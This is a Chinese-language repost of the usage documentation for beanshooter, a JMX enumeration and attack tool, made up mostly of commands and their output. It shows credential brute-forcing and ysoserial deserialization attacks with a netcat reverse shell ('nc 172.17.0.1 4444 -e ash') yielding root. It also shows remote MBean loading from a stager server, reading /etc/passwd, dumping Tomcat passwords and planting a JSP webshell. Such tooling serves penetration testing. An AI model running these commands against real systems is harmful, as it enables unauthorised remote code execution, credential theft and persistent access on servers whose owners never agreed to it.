JMX枚举和攻击工具
作者:Sec-Labs | 发布时间:
项目地址
https://github.com/qtc-de/beanshooter
beanshooter
beanshooter是一种JMX枚举和攻击工具,有助于识别JMX端点上的常见漏洞。
安装
beanshooter是一个Maven项目,安装应该很简单。安装maven后 ,只需执行以下命令即可创建可执行.jar文件:
[qtc@devbox ~]$ git clone https://github.com/qtc-de/beanshooter
[qtc@devbox ~]$ cd beanshooter
[qtc@devbox ~]$ mvn package
您还可以使用为每个版本创建的预构建包。开发分支的预构建包是自动创建的,可以在GitHub 操作页面上找到。还提供了用于运行beanshooter 的预构建 docker 映像。
beanshooter不包括ysoserial作为依赖项。要启用ysoserial支持,您需要将文件路径指定ysoserial.jar为附加参数(例如),或者在构建项目之前更改beanshooter 配置文件--yso /opt/ysoserial.jar中的默认路径。
beanshooter支持bash的自动完成。要利用自动完成功能,您需要 安装completion-helpers项目。如果设置正确,只需将完成脚本复制到您的~/.bash_completion.d文件夹即可启用自动完成。
[qtc@devbox ~]$ cp resources/bash_completion.d/beanshooter ~/bash_completion.d/
目录
支持的操作
不同的beanshooter操作可以分为两组:基本操作和MBean 操作。基本操作用于 在JMX端点上执行一般操作,而MBean 操作针对特定的MBean 进行交互。有关更多详细信息,请查看以下部分中的使用示例。
[qtc@devbox ~]$ beanshooter -h
usage: beanshooter [-h] ...
beanshooter v3.0.0 - a JMX enumeration and attacking tool
positional arguments:
Basic Operations
attr set or get MBean attributes
brute bruteforce JMX credentials
deploy deploys the specified MBean on the JMX server
enum enumerate the JMX service for common vulnerabilities
info display method and attribute information on an MBean
invoke invoke the specified method on the specified MBean
list list available MBEans on the remote MBean server
serial perform a deserialization attack
stager start a stager server to deliver MBeans
undeploy undeploys the specified MBEAN from the JMX server
MBean Operations
diagnostic Diagnostic Command MBean
hotspot HotSpot Diagnostic MBean
mlet default JMX bean that can be used to load additional beans dynamically
recorder jfr Flight Recorder MBean
tomcat tomcat MemoryUserDatabaseMBean used for user management
tonka general purpose bean for executing commands and uploading or download files
named arguments:
-h, --help show this help message and exit
基本操作
基本操作是可以在 JMX 服务上执行的通用操作。这些通常是不针对特定 MBean 或针对没有 beanshooter 内置支持的 MBean 的操作。
Attr
该attr操作可用于获取或设置指定MBean 的属性。要获取可用属性,info应使用以下操作:
[qtc@devbox ~]$ beanshooter info 172.17.0.2 9010
...
[+] MBean Class: sun.management.MemoryImpl
[+] ObjectName: java.lang:type=Memory
[+]
[+] Attributes:
[+] Verbose (type: boolean , writable: true)
[+] ObjectPendingFinalizationCount (type: int , writable: false)
[+] HeapMemoryUsage (type: javax.management.openmbean.CompositeData , writable: false)
[+] NonHeapMemoryUsage (type: javax.management.openmbean.CompositeData , writable: false)
[+] ObjectName (type: javax.management.ObjectName , writable: false)
[+]
[+] Operations:
[+] void gc()
当仅指定属性名称时,beanshooter获取并显示当前属性值:
[qtc@devbox ~]$ beanshooter attr 172.17.0.2 9010 java.lang:type=Memory Verbose
false
指定附加值时,beanshooter会尝试设置相应的属性。对于类型不同于String--type的属性,需要使用选项指定属性类型:
[qtc@devbox ~]$ beanshooter attr 172.17.0.2 9010 java.lang:type=Memory Verbose true --type boolean
[qtc@devbox ~]$ beanshooter attr 172.17.0.2 9010 java.lang:type=Memory Verbose
true
Brute
该操作对受密码保护的JMXbrute服务执行暴力攻击。在没有附加可选参数的情况下运行时,beanshooter使用一个内置的单词列表,其中包含一些常见的用户名-密码组合。对于更专门的攻击,您应该使用和选项来指定更详尽的单词列表。--username-file``--password-file
[qtc@devbox ~]$ beanshooter brute 172.17.0.2 1090
[+] Reading wordlists for the brute action.
[+] Reading credentials from internal wordlist.
[+]
[+] Starting bruteforce attack with 10 credentials.
[+]
[+] Found valid credentials: admin:admin
[+] [10 / 10] [########################################] 100%
[+]
[+] done.
Deploy
该deploy操作可用于在JMX服务上部署MBean。此操作不应用于部署具有默认支持的MBean,例如TonkaBean。应通过相应的 MBean 操作来部署具有默认支持的MBean。
当您要部署的MBean已为JMX服务所知时,只需指定实现 MBean类的类名和所需的ObjectName:
[qtc@devbox ~]$ beanshooter deploy 172.17.0.2 9010 javax.management.monitor.StringMonitor qtc.test:type=Monitor
[+] Starting MBean deployment.
[+]
[+] Deplyoing MBean: StringMonitor
[+] MBean with object name qtc.test:type=Monitor was successfully deployed.
当MBean类不为JMX服务所知时,您可以使用--jar-file和--stager-url选项来提供实现:
[qtc@devbox ~]$ beanshooter deploy 172.17.0.2 9010 non.existing.example.ExampleBean qtc.test:type=Example --jar-file exampleBean.jar --stager-url http://172.17.0.1:8000
[+] Starting MBean deployment.
[+]
[+] Deplyoing MBean: ExampleBean
[+]
[+] MBean class is not known to the server.
[+] Starting MBean deployment.
[+]
[+] Deplyoing MBean: MLet
[+] MBean with object name DefaultDomain:type=MLet was successfully deployed.
[+]
[+] Loading MBean from http://172.17.0.1:8000
[+]
[+] Creating HTTP server on: 172.17.0.1:8000
[+] Creating MLetHandler for endpoint: /
[+] Creating JarHandler for endpoint: /c65c3cdc908348d8bd9a22b8a2bf8be3
[+] Starting HTTP server...
[+]
[+] Incoming request from: iinsecure.example
[+] Requested resource: /
[+] Sending mlet:
[+]
[+] Class: non.existing.example.ExampleBean
[+] Archive: c65c3cdc908348d8bd9a22b8a2bf8be3
[+] Object: qtc.test:type=Example
[+] Codebase: http://172.17.0.1:8000
[+]
[+] Incoming request from: iinsecure.example
[+] Requested resource: /c65c3cdc908348d8bd9a22b8a2bf8be3
[+] Sending jar file with md5sum: c4d8f40d1c1ac7f3cf7582092802a484
[+]
[+] MBean with object name qtc.test:type=Example was successfully deployed.
Enum
该操作枚举了JMXenum端点上的一些配置详细信息。它始终检查JMX端点是否 需要身份验证以及它是否允许预身份验证的任意反序列化。
[qtc@devbox ~]$ beanshooter enum 172.17.0.2 1090
[+] Checking for unauthorized access:
[+]
[+] - Remote MBean server requires authentication.
[+] Vulnerability Status: Non Vulnerable
[+]
[+] Checking pre-auth deserialization behavior:
[+]
[+] - Remote MBeanServer accepted the payload class.
[+] Configuration Status: Non Default
当不需要身份验证或指定了有效凭据时,该enum操作还会尝试从JMX端点枚举一些进一步的信息。这包括非默认MBean的列表,例如在Apache tomcat服务器上注册的用户帐户:
[qtc@devbox ~]$ beanshooter enum 172.17.0.2 1090
[+] Checking for unauthorized access:
[+]
[+] - Remote MBean server does not require authentication.
[+] Vulnerability Status: Vulnerable
[+]
[+] Checking pre-auth deserialization behavior:
[+]
[+] - Remote MBeanServer rejected the payload class.
[+] Vulnerability Status: Non Vulnerable
[+]
[+] Checking available MBeans:
[+]
[+] - 57 MBeans are currently registred on the MBean server.
[+] Listing 39 non default MBeans:
[+] - org.apache.tomcat.util.modeler.BaseModelMBean (Catalina:type=Valve,host=localhost,name=AccessLogValve)
[+] - org.apache.tomcat.util.modeler.BaseModelMBean (Catalina:type=GlobalRequestProcessor,name="http-nio-8080")
[...]
[+]
[+] Enumerating tomcat users:
[+]
[+] - Listing 3 tomcat users:
[+]
[+] ----------------------------------------
[+] Username: manager
[+] Password: P@55w0rD#
[+] Roles:
[+] Users:type=Role,rolename="manager-gui",database=UserDatabase
[+] Users:type=Role,rolename="manager-script",database=UserDatabase
[+] Users:type=Role,rolename="manager-jmx",database=UserDatabase
[+] Users:type=Role,rolename="manager-status",database=UserDatabase
[+]
[+] ----------------------------------------
[+] Username: admin
[+] Password: s3cr3T!$
[+] Roles:
[+] Users:type=Role,rolename="admin-gui",database=UserDatabase
[+] Users:type=Role,rolename="admin-script",database=UserDatabase
[...]
在受SASLenum保护的端点上调用操作时,beanshooter会尝试枚举为服务器配置的SASL配置文件。这仅在一定程度上可行,并且无法枚举服务器的TLS配置。如果beanshooter识别的SASL配置文件不起作用,您应该始终在有/没有选项的情况下重试:--ssl
[qtc@devbox ~]$ beanshooter enum 172.17.0.2 4447 --jmxmp
[+] Checking servers SASL configuration:
[+]
[+] - Remote JMXMP server uses SASL/DIGEST-MD5 SASL profile.
[+] Credentials are requried and the following hostname must be used: iinsecure.example
[+] Notice: TLS setting cannot be enumerated and --ssl may be required.
[+] Vulnerability Status: Non Vulnerable
...
Info
该info操作可用于获取MBean 服务器上可用的MBean的方法和属性信息。在没有附加参数的情况下调用时,将打印所有可用MBean的方法和属性信息。指定额外的ObjectName时,仅打印指定MBean的方法和属性信息:
[qtc@devbox ~]$ beanshooter info 172.17.0.2 9010 java.lang:type=Memory
[+] MBean Class: sun.management.MemoryImpl
[+] ObjectName: java.lang:type=Memory
[+]
[+] Attributes:
[+] Verbose (type: boolean , writable: true)
[+] ObjectPendingFinalizationCount (type: int , writable: false)
[+] HeapMemoryUsage (type: javax.management.openmbean.CompositeData , writable: false)
[+] NonHeapMemoryUsage (type: javax.management.openmbean.CompositeData , writable: false)
[+] ObjectName (type: javax.management.ObjectName , writable: false)
[+]
[+] Operations:
[+] void gc()
Invoke
该invoke操作可用于在已部署在JMX端点上的__MBean上调用任意方法。除了端点之外,该操作还需要目标MBean的和您要调用的方法签名。如果指定的方法需要参数,则也必须指定这些参数。以下清单显示了无参数方法调用的示例,其中调用了来自MBean的方法:invoke``ObjectName``vmVersion()``DiagnosticCommand
[qtc@devbox ~]$ beanshooter invoke 172.17.0.2 1090 com.sun.management:type=DiagnosticCommand --signature 'vmVersion()'
OpenJDK 64-Bit Server VM version 11.0.14.1+1
JDK 11.0.14.1
当调用需要参数的方法时,指定的beanshooter参数被评估为Java code。简单的参数类型,如整数或字符串,可以通过指定相应的值来传递。可以像在Java中那样构造复杂的参数类型(例如'new java.util.HashMap()')。以下清单显示了一个示例,其中在MBeanhelp(String[] args) 上调用了该方法:DiagnosticCommand
[qtc@devbox ~]$ beanshooter invoke 172.17.0.2 1090 com.sun.management:type=DiagnosticCommand --signature 'help(String[] args)' 'new String[] { "Compiler.directives_add" }'
Compiler.directives_add
Add compiler directives from file.
Impact: Low
Permission: java.lang.management.ManagementPermission(monitor)
Syntax : Compiler.directives_add <filename>
Arguments:
filename : Name of the directives file (STRING, no default value)
对于需要一些初始化的更复杂的参数类型,您可以使用beanshooters PluginSystem并定义一个实现IArgumentProvider 接口的自定义类。
Jolokia
正如beanshooters Jolokia 文档中所述,几乎所有beanshooter操作都可以与开关一起使用--jolokia,以针对基于Jolokia的__JMX端点。除了对Jolokia JMX 适配器的这种通用支持外,beanshooter还支持一项专用jolokia操作。此操作可用于强制启用 代理模式运行的Jolokia代理的出站连接:
[qtc@devbox ~]$ beanshooter jolokia 172.17.0.2 8080 172.17.0.1 4444 --username manager --password admin --ldap
[+] Attempting to trigger outboud connection to 172.17.0.1:4444
[+] Using proxy service URL: service:jmx:Rmi:///jndi/ldap://172.17.0.1:4444/beanshooter
...
[qtc@devbox ~]$ nc -vlp 4444
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 172.17.0.2.
Ncat: Connection from 172.17.0.2:60052.
0
通过调用常规的beanshooter操作list并使用该选项可以实现相同的结果--jolokia-proxy service:jmx:... 。该jolokia操作是作为快捷方式添加的,因此您无需记住JNDI语法。使用该 jolokia操作时,该--jolokia选项默认采用。
List
该操作打印远程JMX服务上所有已注册__MBeanlist的列表:
[qtc@devbox ~]$ beanshooter list 172.17.0.2 9010
[+] Available MBeans:
[+]
[+] - sun.management.MemoryManagerImpl (java.lang:name=Metaspace Manager,type=MemoryManager)
[+] - sun.management.MemoryPoolImpl (java.lang:name=Metaspace,type=MemoryPool)
[+] - javax.management.MBeanServerDelegate (JMImplementation:type=MBeanServerDelegate)
[...]
Serial
该serial操作可用于对JMX端点执行反序列化攻击。默认情况下,该操作会尝试进行经过身份验证的反序列化攻击。为此,您的目标JMX服务需要允许未经身份验证的访问或您需要有效的凭据:
[qtc@devbox ~]$ beanshooter serial 172.17.0.2 1090 CommonsCollections6 "nc 172.17.0.1 4444 -e ash" --username admin --password admin
[+] Attemting deserialization attack on JMX endpoint.
[+]
[+] Creating ysoserial payload... done.
[+] MBeanServer attempted to deserialize the DeserializationCanary class.
[+] Deserialization attack was probably successful.
[qtc@devbox ~]$ nc -vlp 4444
[...]
id
uid=0(root) gid=0(root) groups=0(root)
JMX服务也容易受到预验证反序列化攻击。要滥用它,您可以使用--preauth开关:
[qtc@devbox ~]$ beanshooter serial 172.17.0.2 1090 CommonsCollections6 "nc 172.17.0.1 4444 -e ash" --preauth
[+] Attemting deserialization attack on JMX endpoint.
[+]
[+] Creating ysoserial payload... done.
[+] MBeanServer attempted to deserialize the DeserializationCanary class.
[+] Deserialization attack was probably successful.
[qtc@devbox ~]$ nc -vlp 4444
[...]
id
uid=0(root) gid=0(root) groups=0(root)
针对JMXMP端点,预验证反序列化通常是可能的。不幸的是,在操作过程中无法正确枚举它enum。如果您遇到JMXMP端点,您应该试一试。
Stager
该stager操作启动可用于交付MBean 的暂存器服务器。使用beanshooters操作时,通常会自动为__MBean交付创建一个 stager 服务器。但是,有时需要使用独立服务器。使用该操作时,您可以指定要交付的内置MBean的名称(例如)或关键字。如果已指定,则需要和 选项。 deploy``stager``tonka``custom``custom``--class-name``--object-name``--jar-file
[qtc@devbox ~]$ beanshooter tonka deploy 172.17.0.2 9010 --stager-url http://172.17.0.1:8888 --no-stager
[qtc@devbox ~]$ beanshooter stager 172.17.0.1 8888 tonka
[+] Creating HTTP server on: 172.17.0.1:8888
[+] Creating MLetHandler for endpoint: /
[+] Creating JarHandler for endpoint: /93691b8bae4143f087f7a3123641b20d
[+] Starting HTTP server.
[+]
[+] Press Enter to stop listening.
[+]
[+] Incoming request from: iinsecure.example
[+] Requested resource: /
[+] Sending mlet:
[+]
[+] Class: de.qtc.beanshooter.tonkabean.TonkaBean
[+] Archive: 93691b8bae4143f087f7a3123641b20d
[+] Object: MLetTonkaBean:name=TonkaBean,id=1
[+] Codebase: http://172.17.0.1:8888
[+]
[+] Incoming request from: iinsecure.example
[+] Requested resource: /93691b8bae4143f087f7a3123641b20d
[+] Sending jar file with md5sum: 6568ffb2934cb978dbd141848b8b128a
Undeploy
该操作从JMXundeploy服务中删除指定的MBean:ObjectName
[qtc@devbox ~]$ beanshooter undeploy 172.17.0.2 9010 qtc.test:type=Example
[+] Removing MBean with ObjectName qtc.test:type=Example from the MBeanServer.
[+] MBean was successfully removed.
MBean 操作
与以JMX端点公开的一般功能为目标的基本操作相反 ,MBean 操作以特定的MBean为目标。对于每个受支持的MBean,beanshooter提供另一个子解析器,其中包含相应MBean的可用操作和选项。以下清单显示了MBean和关联的子解析器的示例:mlet
[qtc@devbox ~]$ beanshooter mlet -h
usage: beanshooter mlet [-h] ...
positional arguments:
load load a new MBean from the specified URL
attr set or get MBean attributes
deploy deploys the specified MBean on the JMX server
info print server information about the MBean
invoke invoke the specified method on the MBean
stats print local information about the MBean
status checks whether the MBean is registered
undeploy undeploys the specified MBEAN from the JMX server
named arguments:
-h, --help show this help message and exit
通用 MBean 操作
某些beanshooter操作可用于每个MBean,并在本节中进行了演示。这些通用MBean操作通常反映基本操作的功能,但不需要指定ObjectName。
通用Attr
该动作与基本操作中的动作attr相同。attr但是, 不再需要指定ObjectName ,因为它包含在指定的__MBean中。
[qtc@devbox ~]$ beanshooter tomcat attr 172.17.0.2 1090 users
Users:type=User,username="manager",database=UserDatabase
Users:type=User,username="admin",database=UserDatabase
Users:type=User,username="status",database=UserDatabase
通用Deploy
该动作基本上像基本操作中的动作deploy一样工作。但是,由于类名和实现的 jar 文件都已经与指定的MBean相关联,您只需要为此操作指定选项(假设内置 jar 文件可用):deployObjectName``--stager-url
[qtc@devbox ~]$ beanshooter tonka deploy 172.17.0.2 9010 --stager-url http://172.17.0.1:8000
[+] Starting MBean deployment.
[+]
[+] Deplyoing MBean: TonkaBean
[+]
[+] MBean class is not known to the server.
[+] Loading MBean from http://172.17.0.1:8000
[+]
[+] Creating HTTP server on: 172.17.0.1:8000
[+] Creating MLetHandler for endpoint: /
[+] Creating JarHandler for endpoint: /440441bf8c794d40a83caf1e34cd9993
[+] Starting HTTP server...
[+]
[+] Incoming request from: iinsecure.example
[+] Requested resource: /
[+] Sending mlet:
[+]
[+] Class: de.qtc.beanshooter.tonkabean.TonkaBean
[+] Archive: 440441bf8c794d40a83caf1e34cd9993
[+] Object: MLetTonkaBean:name=TonkaBean,id=1
[+] Codebase: http://172.17.0.1:8000
[+]
[+] Incoming request from: iinsecure.example
[+] Requested resource: /440441bf8c794d40a83caf1e34cd9993
[+] Sending jar file with md5sum: 55a843002e13f763137d115ce4caf705
[+]
[+] MBean with object name MLetTonkaBean:name=TonkaBean,id=1 was successfully deployed
通用Export
有时无法使用beanshooters stager 服务器提供__MBean实现。一种常见的情况是与本地计算机的出站连接被阻止。在这些情况下,您可能希望从另一个位置加载 MBean ,例如您具有写入权限的内部网络中的SMB服务。
该export操作导出实现指定MBean 的__jar文件和使用MLet 加载MBean所需的相应__MLet HTML文档。假设你想为TonkaBean提供 一个SMB服务监听,你可以使用以下命令:10.10.10.5
[qtc@devbox ~]$ beanshooter tonka export --export-dir export --stager-url file:////10.10.10.5/share/
[+] Exporting MBean jar file: export/tonka-bean-3.0.0-jar-with-dependencies.jar
[+] Exporting MLet HTML file to: export/index.html
[+] Class: de.qtc.beanshooter.tonkabean.TonkaBean
[+] Archive: tonka-bean-3.0.0-jar-with-dependencies.jar
[+] Object: MLetTonkaBean:name=TonkaBean,id=1
[+] Codebase: file:////10.10.10.5/share/
之后,您可以将导出的jar和index.html文件上传到SMB服务,并使用带有选项的beanshooters 部署操作--stager-url file:////10.10.10.5/share/index.html。
通用Info
该info操作列出指定MBean的方法和属性信息:
[qtc@devbox ~]$ beanshooter tomcat info 172.17.0.2 1090
[+] MBean Class: org.apache.catalina.mbeans.MemoryUserDatabaseMBean
[+] ObjectName: Users:type=UserDatabase,database=UserDatabase
[+]
[+] Attributes:
[+] modelerType (type: java.lang.String , writable: false)
[+] readonly (type: boolean , writable: false)
[+] roles (type: [Ljava.lang.String; , writable: false)
[+] groups (type: [Ljava.lang.String; , writable: false)
[+] users (type: [Ljava.lang.String; , writable: false)
[+] pathname (type: java.lang.String , writable: true)
[+] writable (type: null , writable: false)
[+]
[+] Operations:
[+] java.lang.String findGroup(java.lang.String groupname)
[+] java.lang.String createUser(java.lang.String username, java.lang.String password, java.lang.String fullName)
[+] void removeGroup(java.lang.String groupname)
[+] void removeUser(java.lang.String username)
[+] void save()
[+] java.lang.String findRole(java.lang.String rolename)
[+] void removeRole(java.lang.String rolename)
[+] java.lang.String createGroup(java.lang.String groupname, java.lang.String description)
[+] java.lang.String findUser(java.lang.String username)
[+] java.lang.String createRole(java.lang.String rolename, java.lang.String description)
通用Invoke
该invoke操作可用于在指定的MBean上调用任意方法:
[qtc@devbox ~]$ beanshooter tomcat invoke 172.17.0.2 1090 --signature 'findUser(String username)' admin
Users:type=User,username="admin",database=UserDatabase
通用Stats
该stats操作列出了有关指定MBean的一些一般信息。这是beanshooters本地存储在相应MBean上的信息,不需要服务器交互。
[qtc@devbox ~]$ beanshooter tonka stats
[+] MBean: tonka
[+] Object Name: MLetTonkaBean:name=TonkaBean,id=1
[+] Class Name: de.qtc.beanshooter.tonkabean.TonkaBean
[+] Jar File: available (tonka-bean-3.0.0-jar-with-dependencies.jar)
该信息指示相应MBeanJar File的实现是否内置到beanshooter中。如果未使用该选项覆盖,则在部署期间使用此 jar 文件 。目前,TonkaBean是唯一具有可用Jar 文件的__MBean。--jar-file
通用status
该status操作检查相应的MBean是否已在JMX服务上可用:
[qtc@devbox ~]$ beanshooter tonka status 172.17.0.2 9010
[+] MBean Status: not deployed
通用Undeploy
取消部署操作从远程JMX服务中删除指定的__MBean:
[qtc@devbox ~]$ beanshooter tonka undeploy 172.17.0.2 9010
[+] Removing MBean with ObjectName MLetTonkaBean:name=TonkaBean,id=1 from the MBeanServer.
[+] MBean was successfully removed.
诊断
DiagnosticCommandMBean是一个很有用的MBean,通常默认部署在JMX 服务器_上。它实现了几种不同的方法,从进攻的角度来看很有趣。其中一些被实现为_beanshooter操作。其他的当然可以手动调用。
诊断read
该read操作可用于读取MBean服务器上的文本文件。该操作使用该 addCompilerDirective方法引发包含指定文本文件内容的异常:
[qtc@devbox ~]$ beanshooter diagnostic read 172.17.0.2 1090 /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
...
该技术最初由@TheLaluka在 jolokia-exploitation-toolkit中实现。
诊断Load
该操作可用于从JMX 服务器load的文件系统加载共享库:
[qtc@devbox ~]$ beanshooter diagnostic load 172.17.0.2 1090 /lib/x86_64-linux-gnu/libc.so.6
[+] The server complained about the missing function Agent_OnAttach
[+] The specified library was loaded succesfully.
诊断日志文件
该logfile操作可用于更改JVM的日志文件位置:
[qtc@devbox ~]$ beanshooter diagnostic logfile 172.17.0.2 1090 /tmp/test.log
[+] Logfile path was successfully set to /tmp/test.log
诊断日志
该nolog操作可用于禁用日志记录(对于关闭日志文件句柄很有用):
[qtc@devbox ~]$ beanshooter diagnostic nolog 172.17.0.2 1090
[+] Logging was disabled successfully.
诊断命令行
该操作打印启动JVM 的cmdlinecmdline :
[qtc@devbox ~]$ beanshooter diagnostic cmdline 172.17.0.2 1090
VM Arguments:
jvm_args: --add-opens=java.base/java.lang=ALL-UNNAMED --add-opens=java.base/java.io=ALL-UNNAMED --add-opens=java.base/java.util=ALL-UNNAMED --add-opens=java.base/java.util.concurrent=ALL-UNNAMED --add-opens=java.rmi/sun.rmi.transport=ALL-UNNAMED -Djava.util.logging.config.file=/usr/local/tomcat/conf/logging.properties -Djava.util.logging.manager=org.apache.juli.ClassLoaderLogManager -Djdk.tls.ephemeralDHKeySize=2048 -Djava.protocol.handler.pkgs=org.apache.catalina.webresources -Dorg.apache.catalina.security.SecurityListener.UMASK=0027 -Dignore.endorsed.dirs= -Dcatalina.base=/usr/local/tomcat -Dcatalina.home=/usr/local/tomcat -Djava.io.tmpdir=/usr/local/tomcat/temp -Djava.rmi.server.hostname=iinsecure.example -Djavax.net.ssl.keyStorePassword=password -Djavax.net.ssl.keyStore=/opt/store.p12 -Djavax.net.ssl.keyStoreType=pkcs12 -Dcom.sun.management.jmxremote -Dcom.sun.management.jmxremote.ssl=false -Dcom.sun.management.jmxremote.local.only=false -Dcom.sun.management.jmxremote.authenticate=false -Dcom.sun.management.jmxremote.port=1090 -Dcom.sun.management.jmxremote.rmi.port=1099
java_command: org.apache.catalina.startup.Bootstrap start
java_class_path (initial): /usr/local/tomcat/bin/bootstrap.jar:/usr/local/tomcat/bin/tomcat-juli.jar
Launcher Type: SUN_STANDARD
诊断道具
该props操作打印系统属性列表:
[qtc@devbox ~]$ beanshooter diagnostic props 172.17.0.2 1090
#Mon Jul 25 19:17:52 UTC 2022
com.sun.management.jmxremote.rmi.port=1099
awt.toolkit=sun.awt.X11.XToolkit
java.specification.version=11
sun.cpu.isalist=
...
热点
HotSpotDiagnosticMXBean提供了一个用于管理HotSpot 虚拟机的接口,并支持_一些_ 从进攻角度来看很有用的方法。
热点转储
该dump操作创建堆转储并将其保存到应用程序服务器上的任意位置。唯一的要求是,将转储保存为扩展名为.hprof:
[qtc@devbox ~]$ beanshooter hotspot dump 172.17.0.2 1090 /tmp/dump.hprof
[+] Heapdump file /tmp/dump.hprof was created successfully.
热点列表
该操作打印可用诊断选项及其关联值list的列表:
[qtc@devbox ~]$ beanshooter hotspot list 172.17.0.2 1090
[+] HeapDumpBeforeFullGC (value = false, writable = true)
[+] HeapDumpAfterFullGC (value = false, writable = true)
[+] HeapDumpOnOutOfMemoryError (value = false, writable = true)
[+] HeapDumpPath (value = , writable = true)
...
热点获取
该get操作允许获取指定选项的值:
[qtc@devbox ~]$ beanshooter hotspot get 172.17.0.2 1090 HeapDumpBeforeFullGC
[+] Name: HeapDumpBeforeFullGC
[+] Value: false
[+] Writable: true
热点设置
该set操作允许设置指定选项的值:
[qtc@devbox ~]$ beanshooter hotspot set 172.17.0.2 1090 HeapDumpBeforeFullGC true
[+] Option was set successfully.
[qtc@devbox ~]$ beanshooter hotspot get 172.17.0.2 1090 HeapDumpBeforeFullGC
[+] Name: HeapDumpBeforeFullGC
[+] Value: true
[+] Writable: true
MLet
MLetMBean是众所周知的MBean,可用于通过网络加载其他_MBean 。它已被_beanshooters操作隐式使用,但也可以使用该操作手动调用。 deploy``mlet
允许负载
当前唯一实现的MLet方法是load可用于从用户指定的URL加载__MBean类的操作:
[qtc@devbox ~]$ beanshooter mlet load 172.17.0.2 9010 tonka http://172.17.0.1:8000
[+] Starting MBean deployment.
[+]
[+] Deplyoing MBean: MLet
[+] MBean with object name DefaultDomain:type=MLet was successfully deployed.
[+]
[+] Loading MBean from http://172.17.0.1:8000
[+]
[+] Creating HTTP server on: 172.17.0.1:8000
[+] Creating MLetHandler for endpoint: /
[+] Creating JarHandler for endpoint: /3584de270132420aaf0812366bc46035
[+] Starting HTTP server...
[+]
[+] Incoming request from: iinsecure.example
[+] Requested resource: /
[+] Sending mlet:
[+]
[+] Class: de.qtc.beanshooter.tonkabean.TonkaBean
[+] Archive: 3584de270132420aaf0812366bc46035
[+] Object: MLetTonkaBean:name=TonkaBean,id=1
[+] Codebase: http://172.17.0.1:8000
[+]
[+] Incoming request from: iinsecure.example
[+] Requested resource: /3584de270132420aaf0812366bc46035
[+] Sending jar file with md5sum: b2f7040f7d8f2d1f40b205d631ff7356
[+]
[+] MBean was loaded successfully.
上面的示例演示了如何使用该操作手动加载TonkaBeanmlet。如果您想改为加载自定义MBean,则需要指定关键字custom而不是tonka并提供--class-name,--object-name和--jar-file选项:
[qtc@devbox ~]$ beanshooter mlet load 172.17.0.2 9010 custom http://172.17.0.1:8000 --class-name de.qtc.beanshooter.ExampleBean --object-name ExampleBean:name=ExampleBean,id=1 --jar-file www/example.jar
[+] Starting MBean deployment.
[+] ...
[+] MBean was loaded successfully.
Recoder
FlightRecorderMXBean提供了一个用于管理飞行记录器的接口,并支持_一些_ 从攻击性角度来看很有趣的方法。
新的Recoder
该new操作开始新的记录。返回的录音 ID 可以作为其他操作的目标:
[qtc@devbox ~]$ beanshooter recorder new 172.17.0.2 1090
[+] Requesting new recording on the MBeanServer.
[+] New recording created successfully with ID: 1
记录器启动
该start操作启动一个已经存在的录音,并期望将录音 ID 作为附加参数:
[qtc@devbox ~]$ beanshooter recorder start 172.17.0.2 1090 1
[+] Recording with ID 1 started successfully.
记录器转储
当记录处于活动状态时,可以使用该dump操作转储其内容。这会将记录信息存储在JMX 服务器上的转储文件中:
[qtc@devbox ~]$ beanshooter recorder dump 172.17.0.2 1090 1 /tmp/dump.dat
[+] Recording with ID 1 was successfully dumped to /tmp/dump.dat
Recoder停止
该stop操作可用于停止录制:
[qtc@devbox ~]$ beanshooter recorder stop 172.17.0.2 1090 1
[+] Recording with ID 1 stopped successfully.
Recoder保存
录制停止后,可以使用save操作保存。与dump操作相反,这会将记录保存在本地计算机上,而不是应用程序服务器上。
[qtc@devbox ~]$ beanshooter recorder save 172.17.0.2 1090 1 recording.dat
[+] Saving recording with ID: 1
[+] Writing recording data to: /home/qtc/recording.dat
Tomcat
该tomcat操作与MemoryUserDatabaseMBeanApache Tomcat交互。此MBean提供对__Tomcat服务上可用的用户帐户的访问。
Tomcat 转储
该dump操作将Tomcat服务器上可用的用户名和密码转储到本地文件中。当使用单个参数调用时,凭据以以下格式转储<username>:<password>:
[qtc@devbox ~]$ beanshooter tomcat dump 172.17.0.2 1090 creds.txt
[+] Dumping credentials...
[+] Users dumped to /home/qtc/creds.txt
[qtc@devbox ~]$ cat creds.txt
manager:P@55w0rD#
admin:s3cr3T!$
status:cr@cKM3o.O
当使用两个参数调用时,用户名存储在第一个指定位置,密码存储在第二个:
[qtc@devbox ~]$ beanshooter tomcat dump 172.17.0.2 1090 users.txt passwords.txt
[+] Dumping credentials...
[+] Users dumped to /home/qtc/users.txt
[+] Passwords dumped to /home/qtc/passwords.txt
Tomcat列表
该list操作列出了可用的用户帐户、它们的关联角色和凭据:
[qtc@devbox ~]$ beanshooter tomcat list 172.17.0.2 1090
[+] Listing tomcat users:
[+]
[+] ----------------------------------------
[+] Username: manager
[+] Password: P@55w0rD#
[+] Roles:
[+] Users:type=Role,rolename="manager-gui",database=UserDatabase
[+] Users:type=Role,rolename="manager-script",database=UserDatabase
[+] Users:type=Role,rolename="manager-jmx",database=UserDatabase
[+] Users:type=Role,rolename="manager-status",database=UserDatabase
[+]
[+] ----------------------------------------
[+] Username: admin
[+] Password: s3cr3T!$
[+] Roles:
[+] Users:type=Role,rolename="admin-gui",database=UserDatabase
[+] Users:type=Role,rolename="admin-script",database=UserDatabase
[+]
[+] ----------------------------------------
[+] Username: status
[+] Password: cr@cKM3o.O
[+] Roles:
[+] Users:type=Role,rolename="manager-status",database=UserDatabase
Tomcat写
该write操作将部分控制的文件写入应用程序服务器上的任意位置。此操作可用于在Tomcat服务上可靠地部署 webshell:
[qtc@devbox ~]$ beanshooter tomcat write 172.17.0.2 1090 /opt/webshell-cli/webshells/webshell.jsp /usr/local/tomcat/webapps/ROOT/shell.jsp
[+] Writing local file /opt/webshell-cli/webshells/webshell.jsp to server location /usr/local/tomcat/webapps/ROOT/shell.jsp
[+] Current user database is at conf/tomcat-users.xml
[+] Current user database is readonly
[+] Adjusting readonly property to make it writable.
[+] Changing database path to /usr/local/tomcat/webapps/ROOT/shell.jsp
[+] Creating new role containing the local file content.
[+] Saving modified user database.
[+] Restoring readonly property.
[+] Restoring pathname property.
[+] All done.
[qtc@devbox ~]$ webshell-cli http://172.17.0.2:8080/shell.jsp
